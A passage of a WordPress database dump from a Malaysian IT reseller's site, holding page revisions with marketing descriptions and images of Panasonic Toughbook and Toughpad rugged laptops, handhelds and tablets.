Product','','inherit','closed','closed','','2580-revision-v1','','','2018-12-20 11:17:44','2018-12-20 03:17:44','',2580,'https://bintara.com.my/blog/2018/12/20/2580-revision-v1/',0,'revision','',0),(2642,1,'2018-12-20 14:39:02','2018-12-20 06:39:02','','DXS-1210-12TC_A1_Image-LFront-510x600-510x600','','inherit','closed','closed','','dxs-1210-12tc_a1_image-lfront-510x600-510x600','','','2018-12-20 14:39:02','2018-12-20 06:39:02','',1480,'https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12TC_A1_Image-LFront-510x600-510x600.jpg',0,'attachment','image/jpeg',0),(2624,1,'2018-12-20 11:04:44','2018-12-20 03:04:44','[vfb id=3]','Get Quotation (Panasonic Toughbook)','','inherit','closed','closed','','2619-revision-v1','','','2018-12-20 11:04:44','2018-12-20 03:04:44','',2619,'https://bintara.com.my/blog/2018/12/20/2619-revision-v1/',0,'revision','',0),(2628,1,'2018-12-20 11:20:18','2018-12-20 03:20:18','<h3>Computer Toughbook</h3>		\n			<h4>TOUGHBOOK 33</h4>		\n			<h4>TOUGHBOOK 31</h4>		\n			<h4>TOUGHBOOK 54</h4>		\n										<img width=\"418\" height=\"389\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/tb_33_hero.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/tb_33_hero.png 418w, https://bintara.com.my/wp-content/uploads/2018/12/tb_33_hero-300x279.png 300w\" sizes=\"(max-width: 418px) 100vw, 418px\" />											\n										<img width=\"519\" height=\"389\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/tb31_win10.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/tb31_win10.jpg 519w, https://bintara.com.my/wp-content/uploads/2018/12/tb31_win10-300x225.jpg 300w\" sizes=\"(max-width: 519px) 100vw, 519px\" />											\n										<img width=\"418\" height=\"389\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/tb_54_hero.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/tb_54_hero.png 418w, https://bintara.com.my/wp-content/uploads/2018/12/tb_54_hero-300x279.png 300w\" sizes=\"(max-width: 418px) 100vw, 418px\" />											\n		<h5>PRODUCT DETAILS</h5><p>The Panasonic TOUGHBOOKÂ® 33 is the first fully-rugged 2-in-1 of its kindâ€”redefining rugged flexibility for those who work in demanding conditions. TOUGHBOOK 33 features a groundbreaking 3:2 display, making it easier to handle, while improving readability of the business applications and documents workers use every day. This innovative design also enables backward compatibility with an entire generation of TOUGHBOOK 31 vehicle docks. It\'s as versatile as your job demands it to be. From a brighter 12\" detachable screen with infrared camera for Windows Hello support, to hot-swappable twin batteries and a choice of keyboardsâ€”TOUGHBOOK 33 is built for maximum mobility.</p><p>[maxbutton id=\"5\" ]</p><header></header>PRODUCT DETAILS<p>Panasonic presents the TOUGHBOOKÂ® 31, the reliable laptop offeringÂ the worldâ€™s most rugged design. With drop-shock protection and aÂ MIL-STD-810G certification, itâ€™s the undisputed leader in the fullyÂ rugged category. Its IntelÂ® Coreâ„¢ i5 processor packs a punch and it delivers amazing battery lifeâ€”19.5 hours, or 29 hours with the optional media bayÂ 2nd battery. Combine six generations of delivering rugged performanceÂ plus an amazing 18 years of consistent docking compatibility, TOUGHBOOK 31 is a laptop that will go the distance with you anytime, anywhere.</p><p>[maxbutton id=\"5\" ]</p><h5>PRODUCT DETAILS</h5><p>A semi-rugged 14â€ laptop, the TOUGHBOOK 54 is the world\'s thinnest and lightest semi-rugged in its class, but now packs even more of a punch. The TOUGHBOOK 54 is now available with 7th Gen IntelÂ® processors running WindowsÂ® 10 Pro and feature a spill-resistant, full magnesium alloy design, storage drive heater and backlit keyboard. The TOUGHBOOK 54 has a wide range of integrated options such as dedicated GPS, 4G LTE mobile broadband with satellite GPS, and dual antenna pass-through. It offers an optional second battery, allowing hot swap battery replacement without the need to shut down or hibernate. The TOUGHBOOK 54 one of the most versatile and advanced semi-rugged notebooks on the market.</p><p>[maxbutton id=\"5\" ]</p>		\n			<h4>TOUGHBOOK 20</h4>		\n			<h4>TOUGHPAD FZ-Q2</h4>		\n										<img width=\"300\" height=\"225\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/20mk2_laptop_right_angle_detached-1-300x225.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/20mk2_laptop_right_angle_detached-1-300x225.jpg 300w, https://bintara.com.my/wp-content/uploads/2018/12/20mk2_laptop_right_angle_detached-1.jpg 518w\" sizes=\"(max-width: 300px) 100vw, 300px\" />											\n										<img width=\"300\" height=\"285\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/toughpad-q2-hero-300x285.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/toughpad-q2-hero-300x285.png 300w, https://bintara.com.my/wp-content/uploads/2018/12/toughpad-q2-hero.png 390w\" sizes=\"(max-width: 300px) 100vw, 300px\" />											\n		<h5>PRODUCT DETAILS</h5><p>The Panasonic TOUGHBOOKÂ® 20 is a fully rugged, lightweight laptop that easily detaches to become a 10.1\" tablet. And it only takes one hand. The detachable laptop has a magnesium alloy chassis and is also MIL-STD-810G and IP65 certified, so it can take the abuse of most any job site. At only 3.9 pounds, this 2-in-1 machine is good on the go. The clever built-in handle also functions as a kickstand, providing on-the-job flexibility. And even as the workday gets longer, power won\'t be a problem. The optional bridge battery allows hot swap battery replacement without disruption. The gloved multi touch display is sunlight-viewable, making this hybrid laptop perfect for rugged outdoor environments. With this detachable laptop tablet at your side, you can handle anything the workday throws at you.</p><p>[maxbutton id=\"5\" ]</p><h5>PRODUCT DETAILS</h5><p>From the industry leader in reliability comes the Panasonic TOUGHPADÂ® FZ-Q2 12.5-inch 2-in-1 WindowsÂ® 10 PC. Built with the rugged durability consumers have come to expect from TOUGHBOOK, this PC is designed for users who need more from their computer than what a typical consumer device can provide. Enhanced with features like a superior battery life and additional ports, the TOUGHPAD FZ-Q2 semi-rugged convertible tablet also possesses a full HD display with an anti-reflective touchscreen along with a spill-resistant keyboard to maximize usability in the field or in the office.</p><p>[maxbutton id=\"5\" ]</p>		\n			<h3>Handhelds</h3>		\n			<h4>TOUGHBOOK T1</h4>		\n			<h4>TOUGHBOOK N1</h4>		\n			<h4>TOUGHPAD FZ-X1</h4>		\n										<img width=\"277\" height=\"389\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/fz-t1_image1-1_ss_1.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/fz-t1_image1-1_ss_1.jpg 277w, https://bintara.com.my/wp-content/uploads/2018/12/fz-t1_image1-1_ss_1-214x300.jpg 214w\" sizes=\"(max-width: 277px) 100vw, 277px\" />											\n										<img width=\"416\" height=\"389\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/fz-n1_mk2_android_image_2_1.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/fz-n1_mk2_android_image_2_1.jpg 416w, https://bintara.com.my/wp-content/uploads/2018/12/fz-n1_mk2_android_image_2_1-300x281.jpg 300w\" sizes=\"(max-width: 416px) 100vw, 416px\" />											\n										<img width=\"210\" height=\"389\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/236380_F1X1_Hero.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/236380_F1X1_Hero.png 210w, https://bintara.com.my/wp-content/uploads/2018/12/236380_F1X1_Hero-162x300.png 162w\" sizes=\"(max-width: 210px) 100vw, 210px\" />											\n		<h5>PRODUCT DETAILS</h5><p>The Panasonic TOUGHBOOKÂ®Â T1 is a slim and sleek Android OS based handheld that proudly carries the TOUGHBOOKÂ name. Its ability to be used in the enterprise to collect information from workers in retail stores, warehouses field service, transportation and delivery or many other environments where work must occur belies its mild looking exterior. The FZ-T1 has a quad-core processor and a straight-shooting barcode reader, options to have a pistol grip with trigger, use a stylus pen or connect to multi-carrier 4G LTE with voice capability, yet end users will feel comfortable with its Android OS. This handheld\'s users wonâ€™t miss a beat with its great battery life, glove and rain touch enabled 5\" screen, 5 foot drop rating and IP66 and IP68 certification.Â  The TOUGHBOOKÂ T1 is ready to be used by satisfied end users everywhere in your organization.</p><p>[maxbutton id=\"5\" ]</p><h5>PRODUCT DETAILS</h5><p>The Panasonic TOUGHBOOKÂ® N1 â€” a powerful, slim and fully rugged handheld. Itâ€™s the all-in-one tool youâ€™ve been waiting for, and itâ€™s ideal for where work takes you each day. With an octa-core processor, angled rear-facing barcode reader, optional stylus pen, and long-lasting battery that is warm-swappable; you wonâ€™t miss a beat. And when a flexible device is in demand, the TOUGHBOOK N1 delivers the Androidâ„¢ operating system,Â giving you the ability to develop in an open environment with thousands of enterprise grade applications at your fingertips from the Google Play store or Panasonic\'s partners: independent software vendors (ISVs) and resellers/integrators. Plus, with built-in multi-carrier 4G LTE, voice capabilities, and dual SIM cards, the TOUGHBOOK N1 is ready to go where business takes you. And if it takes a seven-foot drop, donâ€™t worry â€” it can handle it, making it the choice for unrelenting conditions. So take it to work. It can take it.</p><p>[maxbutton id=\"5\" ]</p><h5>PRODUCT DETAILS</h5><p>The TOUGHPADÂ® FZ-X1 is the world\'s most rugged 5-inch tablet and a whole lot more. For the first time, you can pair military-grade toughness and enterprise-class mobile computing power with Android-powered 4G data and voice services. Now field staff in the most demanding environments can have all the computing power they need in a handheld tablet small enough to drop in a pocket. Built on the flexible, secure Android 5.1.1 OS, the FZ-X1 lets businesses leverage their existing investments in enterprise applications without sacrificing performance and ruggedness. And it is seriously rugged.Â Thirty minutes of under five feet of water rugged.Â Ten foot drops onto solid concrete rugged. Built-in heater for -4Â° F weather rugged. Whether you throw it in a toolbox or literally take it into battle, the FZ-X1 can handle whatever comes its way.</p><p>[maxbutton id=\"5\" ]</p>		\n			<h3>Tablets</h3>		\n			<h4>TOUGHBOOK L1</h4>		\n			<h4>TOUGHPAD FZ-M1</h4>		\n			<h4>TOUGHPAD FZ-G1</h4>		\n										<img width=\"519\" height=\"389\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/fz-l1_right_ss.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/fz-l1_right_ss.jpg 519w, https://bintara.com.my/wp-content/uploads/2018/12/fz-l1_right_ss-300x225.jpg 300w\" sizes=\"(max-width: 519px) 100vw, 519px\" />											\n										<img width=\"584\" height=\"389\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/fz-m1_image_01_new_win10.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/fz-m1_image_01_new_win10.jpg 584w, https://bintara.com.my/wp-content/uploads/2018/12/fz-m1_image_01_new_win10-300x200.jpg 300w\" sizes=\"(max-width: 584px) 100vw, 584px\" />											\n										<img width=\"519\" height=\"389\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/fz-g1mk5_us_image02_ss.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/fz-g1mk5_us_image02_ss.jpg 519w, https://bintara.com.my/wp-content/uploads/2018/12/fz-g1mk5_us_image02_ss-300x225.jpg 300w\" sizes=\"(max-width: 519px) 100vw, 519px\" />											\n		<h5>PRODUCT DETAILS</h5><p>The Panasonic TOUGHBOOK L1 is a slim and sleek Androidâ„¢ OS basedÂ 7\" tablet that proudly carries the TOUGHBOOKÂ name. Its ability to be usedÂ in the enterprise to collect information from workers in retail stores,Â warehouses field service, transportation and delivery or many otherÂ environments where work must occur belies its mild looking exterior.Â The TOUGHBOOK L1 has a quad-core processor and optional straight-shootingÂ barcode reader from portrait to landscape, use a stylus pen or connectÂ to multi-carrier 4G LTE and provide the ease of use of the Andorid OS.Â This tabletâ€™s users wonâ€™t miss a beat with its great battery life, glove andÂ rain touch enabled 7\" screen, 5 foot drop rating and IP65 and IP67Â certification. The TOUGHBOOK L1 is ready to be used by satisfied endÂ users everywhere in your organization.</p><p>[maxbutton id=\"5\" ]</p><h5>PRODUCT DETAILS</h5><p>The Panasonic FZ-M1 is the fully rugged WindowsÂ® tablet, built toÂ enable mission-critical mobile worker productivity without compromise. PoweredÂ by WindowsÂ® 10 Pro, the FZ-M1 features a long life, user-replaceableÂ battery and a daylight-readable, high-sensitivity multi-touch display for useÂ with heavy gloves. With the broadest range of configuration options available inÂ its class, the highly customizable FZ-M1 is the ideal tool for todayâ€™sÂ mobile workforce. In addition to the highly configurable options, added modelsÂ of Thermal Camera, Real Sense Camera, RTK/GPS, as well as several more.Â Allows the FZ-M1 to be the most comprehensive 7\" tablet in the market.</p><p>[maxbutton id=\"5\" ]</p><h5>PRODUCT DETAILS</h5><p>The FZ-G1 Windows 10 Pro tablet offers a fluid user experienceÂ while providing crucial port connectivity and feature-rich options in a compactÂ size. Designed for highly mobile field workers, itâ€™s the thinnest and lightestÂ fully rugged 10.1\" tablet running Windows 10 Pro 64-Bit. Powered by anÂ IntelÂ® Coreâ„¢ i5 vProâ„¢ processor with a MIL-STD-810G and IP65 certified, the FZ-G1 Windows 10 tablet leads the way in rugged mobileÂ computing. Add to that an HD daylight-readable 10-point gloved multi touch +Â waterproof digitizer pen, and it becomes an essential tool for field workers.Â With added Thermal camera and IR camera options.Â  Can also support \"Windows Hello\" for enhanced security.</p><p>[maxbutton id=\"5\" ]</p>		\n			<h4>TOUGHPAD FZ-A2</h4>		\n			<h4>TOUGHPAD FZ-B2</h4>		\n										<img width=\"418\" height=\"389\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/tb_fz_a2_hero_front-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/tb_fz_a2_hero_front-1.png 418w, https://bintara.com.my/wp-content/uploads/2018/12/tb_fz_a2_hero_front-1-300x279.png 300w\" sizes=\"(max-width: 418px) 100vw, 418px\" />											\n										<img width=\"400\" height=\"334\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/prod-jtb2-hero.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/prod-jtb2-hero.png 400w, https://bintara.com.my/wp-content/uploads/2018/12/prod-jtb2-hero-300x251.png 300w\" sizes=\"(max-width: 400px) 100vw, 400px\" />											\n		<h5>PRODUCT DETAILS</h5><p>With the Android 6.0 (Marshmallow) operating system and IntelÂ® x5-Z8550 processor, the Panasonic TOUGHPADÂ® A2 10.1-inch fully rugged Androidâ„¢ tablet provides enterprise features and reliability miles ahead of consumer tablets. With the ability to be WWAN 4G LTE connected and a super-bright 800 NIT screen, it is the perfect solution for workers in the field. However demanding the job, the dependable TOUGHPADÂ FZ-A2 tablet is up to the task.</p><p>[maxbutton id=\"5\" ]</p><h5>PRODUCT DETAILS</h5><p>The rugged, 7-inch Panasonic TOUGHPADÂ® FZ-B2, now powered by Androidâ„¢ 6.0.1 (Marshmallow) and the latest IntelÂ® AtomTM x5-Z8550 processor is an easy-to-use, enterprise-grade productivity booster that works rain or shine. With durability, power and a range of configuration options â€“ at a price within reach of any business â€“ the TOUGHPADÂ FZ-B2 features a faster CPU, upgraded rear camera and Wi-Fi chipset, a quick-charging, user-replaceable full-shift battery and a Near Field Communications option. With a fully rugged and sealed design, the thin and lightweight TOUGHPADÂ FZ-B2 is built for long-lasting durability where others fail.</p><p>[maxbutton id=\"5\" ]</p>','Panasonic Toughbook Product','','inherit','closed','closed','','2580-revision-v1','','','2018-12-20 11:20:18','2018-12-20 03:20:18','',2580,'https://bintara.com.my/blog/2018/12/20/2580-revision-v1/',0,'revision','',0),(2678,1,'2018-12-21 09:46:04','2018-12-21 01:46:04','<h3>Computer Toughbook</h3>		\n			<h4>TOUGHBOOK 33</h4>		\n										<img width=\"418\" height=\"389\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/tb_33_hero.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/tb_33_hero.png 418w, https://bintara.com.my/wp-content/uploads/2018/12/tb_33_hero-300x279.png 300w\" sizes=\"(max-width: 418px) 100vw, 418px\" />											\n		<h5>PRODUCT DETAILS</h5><p>The Panasonic TOUGHBOOKÂ® 33 is the first fully-rugged 2-in-1 of its kindâ€”redefining rugged flexibility for those who work in demanding conditions. TOUGHBOOK 33 features a groundbreaking 3:2 display, making it easier to handle, while improving readability of the business applications and documents workers use every day. This innovative design also enables backward compatibility with an entire generation of TOUGHBOOK 31 vehicle docks. It\'s as versatile as your job demands it to be. From a brighter 12\" detachable screen with infrared camera for Windows Hello support, to hot-swappable twin batteries and a choice of keyboardsâ€”TOUGHBOOK 33 is built for maximum mobility.</p><p>[maxbutton id=\"5\" ]</p>		\n			<h4>TOUGHBOOK 31</h4>		\n										<img width=\"519\" height=\"389\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/tb31_win10.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/tb31_win10.jpg 519w, https://bintara.com.my/wp-content/uploads/2018/12/tb31_win10-300x225.jpg 300w\" sizes=\"(max-width: 519px) 100vw, 519px\" />											\n		<header></header>PRODUCT DETAILS<p>Panasonic presents the TOUGHBOOKÂ® 31, the reliable laptop offeringÂ the worldâ€™s most rugged design. With drop-shock protection and aÂ MIL-STD-810G certification, itâ€™s the undisputed leader in the fullyÂ rugged category. Its IntelÂ® Coreâ„¢ i5 processor packs a punch and it delivers amazing battery lifeâ€”19.5 hours, or 29 hours with the optional media bayÂ 2nd battery. Combine six generations of delivering rugged performanceÂ plus an amazing 18 years of consistent docking compatibility, TOUGHBOOK 31 is a laptop that will go the distance with you anytime, anywhere.</p><p>[maxbutton id=\"5\" ]</p>		\n			<h4>TOUGHBOOK 54</h4>		\n										<img width=\"418\" height=\"389\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/tb_54_hero.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/tb_54_hero.png 418w, https://bintara.com.my/wp-content/uploads/2018/12/tb_54_hero-300x279.png 300w\" sizes=\"(max-width: 418px) 100vw, 418px\" />											\n		<h5>PRODUCT DETAILS</h5><p>A semi-rugged 14â€ laptop, the TOUGHBOOK 54 is the world\'s thinnest and lightest semi-rugged in its class, but now packs even more of a punch. The TOUGHBOOK 54 is now available with 7th Gen IntelÂ® processors running WindowsÂ® 10 Pro and feature a spill-resistant, full magnesium alloy design, storage drive heater and backlit keyboard. The TOUGHBOOK 54 has a wide range of integrated options such as dedicated GPS, 4G LTE mobile broadband with satellite GPS, and dual antenna pass-through. It offers an optional second battery, allowing hot swap battery replacement without the need to shut down or hibernate. The TOUGHBOOK 54 one of the most versatile and advanced semi-rugged notebooks on the market.</p><p>[maxbutton id=\"5\" ]</p>		\n			<h4>TOUGHBOOK 20</h4>		\n										<img width=\"300\" height=\"225\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/20mk2_laptop_right_angle_detached-1-300x225.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/20mk2_laptop_right_angle_detached-1-300x225.jpg 300w, https://bintara.com.my/wp-content/uploads/2018/12/20mk2_laptop_right_angle_detached-1.jpg 518w\" sizes=\"(max-width: 300px) 100vw, 300px\" />											\n		<h5>PRODUCT DETAILS</h5><p>The Panasonic TOUGHBOOKÂ® 20 is a fully rugged, lightweight laptop that easily detaches to become a 10.1\" tablet. And it only takes one hand. The detachable laptop has a magnesium alloy chassis and is also MIL-STD-810G and IP65 certified, so it can take the abuse of most any job site. At only 3.9 pounds, this 2-in-1 machine is good on the go. The clever built-in handle also functions as a kickstand, providing on-the-job flexibility. And even as the workday gets longer, power won\'t be a problem. The optional bridge battery allows hot swap battery replacement without disruption. The gloved multi touch display is sunlight-viewable, making this hybrid laptop perfect for rugged outdoor environments. With this detachable laptop tablet at your side, you can handle anything the workday throws at you.</p><p>[maxbutton id=\"5\" ]</p>		\n			<h4>TOUGHPAD FZ-Q2</h4>		\n										<img width=\"300\" height=\"285\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/toughpad-q2-hero-300x285.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/toughpad-q2-hero-300x285.png 300w, https://bintara.com.my/wp-content/uploads/2018/12/toughpad-q2-hero.png 390w\" sizes=\"(max-width: 300px) 100vw, 300px\" />											\n		<h5>PRODUCT DETAILS</h5><p>From the industry leader in reliability comes the Panasonic TOUGHPADÂ® FZ-Q2 12.5-inch 2-in-1 WindowsÂ® 10 PC. Built with the rugged durability consumers have come to expect from TOUGHBOOK, this PC is designed for users who need more from their computer than what a typical consumer device can provide. Enhanced with features like a superior battery life and additional ports, the TOUGHPAD FZ-Q2 semi-rugged convertible tablet also possesses a full HD display with an anti-reflective touchscreen along with a spill-resistant keyboard to maximize usability in the field or in the office.</p><p>[maxbutton id=\"5\" ]</p>		\n			<h3>Handhelds</h3>		\n			<h4>TOUGHBOOK T1</h4>		\n										<img width=\"277\" height=\"389\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/fz-t1_image1-1_ss_1.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/fz-t1_image1-1_ss_1.jpg 277w, https://bintara.com.my/wp-content/uploads/2018/12/fz-t1_image1-1_ss_1-214x300.jpg 214w\" sizes=\"(max-width: 277px) 100vw, 277px\" />											\n		<h5>PRODUCT DETAILS</h5><p>The Panasonic TOUGHBOOKÂ®Â T1 is a slim and sleek Android OS based handheld that proudly carries the TOUGHBOOKÂ name. Its ability to be used in the enterprise to collect information from workers in retail stores, warehouses field service, transportation and delivery or many other environments where work must occur belies its mild looking exterior. The FZ-T1 has a quad-core processor and a straight-shooting barcode reader, options to have a pistol grip with trigger, use a stylus pen or connect to multi-carrier 4G LTE with voice capability, yet end users will feel comfortable with its Android OS. This handheld\'s users wonâ€™t miss a beat with its great battery life, glove and rain touch enabled 5\" screen, 5 foot drop rating and IP66 and IP68 certification.Â  The TOUGHBOOKÂ T1 is ready to be used by satisfied end users everywhere in your organization.</p><p>[maxbutton id=\"5\" ]</p>		\n			<h4>TOUGHBOOK N1</h4>		\n										<img width=\"416\" height=\"389\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/fz-n1_mk2_android_image_2_1.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/fz-n1_mk2_android_image_2_1.jpg 416w, https://bintara.com.my/wp-content/uploads/2018/12/fz-n1_mk2_android_image_2_1-300x281.jpg 300w\" sizes=\"(max-width: 416px) 100vw, 416px\" />											\n		<h5>PRODUCT DETAILS</h5><p>The Panasonic TOUGHBOOKÂ® N1 â€” a powerful, slim and fully rugged handheld. Itâ€™s the all-in-one tool youâ€™ve been waiting for, and itâ€™s ideal for where work takes you each day. With an octa-core processor, angled rear-facing barcode reader, optional stylus pen, and long-lasting battery that is warm-swappable; you wonâ€™t miss a beat. And when a flexible device is in demand, the TOUGHBOOK N1 delivers the Androidâ„¢ operating system,Â giving you the ability to develop in an open environment with thousands of enterprise grade applications at your fingertips from the Google Play store or Panasonic\'s partners: independent software vendors (ISVs) and resellers/integrators. Plus, with built-in multi-carrier 4G LTE, voice capabilities, and dual SIM cards, the TOUGHBOOK N1 is ready to go where business takes you. And if it takes a seven-foot drop, donâ€™t worry â€” it can handle it, making it the choice for unrelenting conditions. So take it to work. It can take it.</p><p>[maxbutton id=\"5\" ]</p>		\n			<h4>TOUGHPAD FZ-X1</h4>		\n										<img width=\"210\" height=\"389\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/236380_F1X1_Hero.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/236380_F1X1_Hero.png 210w, https://bintara.com.my/wp-content/uploads/2018/12/236380_F1X1_Hero-162x300.png 162w\" sizes=\"(max-width: 210px) 100vw, 210px\" />											\n		<h5>PRODUCT DETAILS</h5><p>The TOUGHPADÂ® FZ-X1 is the world\'s most rugged 5-inch tablet and a whole lot more. For the first time, you can pair military-grade toughness and enterprise-class mobile computing power with Android-powered 4G data and voice services. Now field staff in the most demanding environments can have all the computing power they need in a handheld tablet small enough to drop in a pocket. Built on the flexible, secure Android 5.1.1 OS, the FZ-X1 lets businesses leverage their existing investments in enterprise applications without sacrificing performance and ruggedness. And it is seriously rugged.Â Thirty minutes of under five feet of water rugged.Â Ten foot drops onto solid concrete rugged. Built-in heater for -4Â° F weather rugged. Whether you throw it in a toolbox or literally take it into battle, the FZ-X1 can handle whatever comes its way.</p><p>[maxbutton id=\"5\" ]</p>		\n			<h3>Tablets</h3>		\n			<h4>TOUGHBOOK L1</h4>		\n										<img width=\"519\" height=\"389\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/fz-l1_right_ss.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/fz-l1_right_ss.jpg 519w, https://bintara.com.my/wp-content/uploads/2018/12/fz-l1_right_ss-300x225.jpg 300w\" sizes=\"(max-width: 519px) 100vw, 519px\" />											\n		<h5>PRODUCT DETAILS</h5><p>The Panasonic TOUGHBOOK L1 is a slim and sleek Androidâ„¢ OS basedÂ 7\" tablet that proudly carries the TOUGHBOOKÂ name. Its ability to be usedÂ in the enterprise to collect information from workers in retail stores,Â warehouses field service, transportation and delivery or many otherÂ environments where work must occur belies its mild looking exterior.Â The TOUGHBOOK L1 has a quad-core processor and optional straight-shootingÂ barcode reader from portrait to landscape, use a stylus pen or connectÂ to multi-carrier 4G LTE and provide the ease of use of the Andorid OS.Â This tabletâ€™s users wonâ€™t miss a beat with its great battery life, glove andÂ rain touch enabled 7\" screen, 5 foot drop rating and IP65 and IP67Â certification. The TOUGHBOOK L1 is ready to be used by satisfied endÂ users everywhere in your organization.</p><p>[maxbutton id=\"5\" ]</p>		\n			<h4>TOUGHPAD FZ-M1</h4>		\n										<img width=\"584\" height=\"389\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/fz-m1_image_01_new_win10.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/fz-m1_image_01_new_win10.jpg 584w, https://bintara.com.my/wp-content/uploads/2018/12/fz-m1_image_01_new_win10-300x200.jpg 300w\" sizes=\"(max-width: 584px) 100vw, 584px\" />											\n		<h5>PRODUCT DETAILS</h5><p>The Panasonic FZ-M1 is the fully rugged WindowsÂ® tablet, built toÂ enable mission-critical mobile worker productivity without compromise. PoweredÂ by WindowsÂ® 10 Pro, the FZ-M1 features a long life, user-replaceableÂ battery and a daylight-readable, high-sensitivity multi-touch display for useÂ with heavy gloves. With the broadest range of configuration options available inÂ its class, the highly customizable FZ-M1 is the ideal tool for todayâ€™sÂ mobile workforce. In addition to the highly configurable options, added modelsÂ of Thermal Camera, Real Sense Camera, RTK/GPS, as well as several more.Â Allows the FZ-M1 to be the most comprehensive 7\" tablet in the market.</p><p>[maxbutton id=\"5\" ]</p>		\n			<h4>TOUGHPAD FZ-G1</h4>		\n										<img width=\"519\" height=\"389\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/fz-g1mk5_us_image02_ss.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/fz-g1mk5_us_image02_ss.jpg 519w, https://bintara.com.my/wp-content/uploads/2018/12/fz-g1mk5_us_image02_ss-300x225.jpg 300w\" sizes=\"(max-width: 519px) 100vw, 519px\" />											\n		<h5>PRODUCT DETAILS</h5><p>The FZ-G1 Windows 10 Pro tablet offers a fluid user experienceÂ while providing crucial port connectivity and feature-rich options in a compactÂ size. Designed for highly mobile field workers, itâ€™s the thinnest and lightestÂ fully rugged 10.1\" tablet running Windows 10 Pro 64-Bit. Powered by anÂ IntelÂ® Coreâ„¢ i5 vProâ„¢ processor with a MIL-STD-810G and IP65 certified, the FZ-G1 Windows 10 tablet leads the way in rugged mobileÂ computing. Add to that an HD daylight-readable 10-point gloved multi touch +Â waterproof digitizer pen, and it becomes an essential tool for field workers.Â With added Thermal camera and IR camera options.Â  Can also support \"Windows Hello\" for enhanced security.</p><p>[maxbutton id=\"5\" ]</p>		\n			<h4>TOUGHPAD FZ-A2</h4>		\n										<img width=\"418\" height=\"389\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/tb_fz_a2_hero_front-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/tb_fz_a2_hero_front-1.png 418w, https://bintara.com.my/wp-content/uploads/2018/12/tb_fz_a2_hero_front-1-300x279.png 300w\" sizes=\"(max-width: 418px) 100vw, 418px\" />											\n		<h5>PRODUCT DETAILS</h5><p>With the Android 6.0 (Marshmallow) operating system and IntelÂ® x5-Z8550 processor, the Panasonic TOUGHPADÂ® A2 10.1-inch fully rugged Androidâ„¢ tablet provides enterprise features and reliability miles ahead of consumer tablets. With the ability to be WWAN 4G LTE connected and a super-bright 800 NIT screen, it is the perfect solution for workers in the field. However demanding the job, the dependable TOUGHPADÂ FZ-A2 tablet is up to the task.</p><p>[maxbutton id=\"5\" ]</p>		\n			<h4>TOUGHPAD FZ-B2</h4>		\n										<img width=\"400\" height=\"334\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/prod-jtb2-hero.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/prod-jtb2-hero.png 400w, https://bintara.com.my/wp-content/uploads/2018/12/prod-jtb2-hero-300x251.png 300w\" sizes=\"(max-width: 400px) 100vw, 400px\" />											\n		<h5>PRODUCT DETAILS</h5><p>The rugged, 7-inch Panasonic TOUGHPADÂ® FZ-B2, now powered by Androidâ„¢ 6.0.1 (Marshmallow) and the latest IntelÂ® AtomTM x5-Z8550 processor is an easy-to-use, enterprise-grade productivity booster that works rain or shine. With durability, power and a range of configuration options â€“ at a price within reach of any business â€“ the TOUGHPADÂ FZ-B2 features a faster CPU, upgraded rear camera and Wi-Fi chipset, a quick-charging, user-replaceable full-shift battery and a Near Field 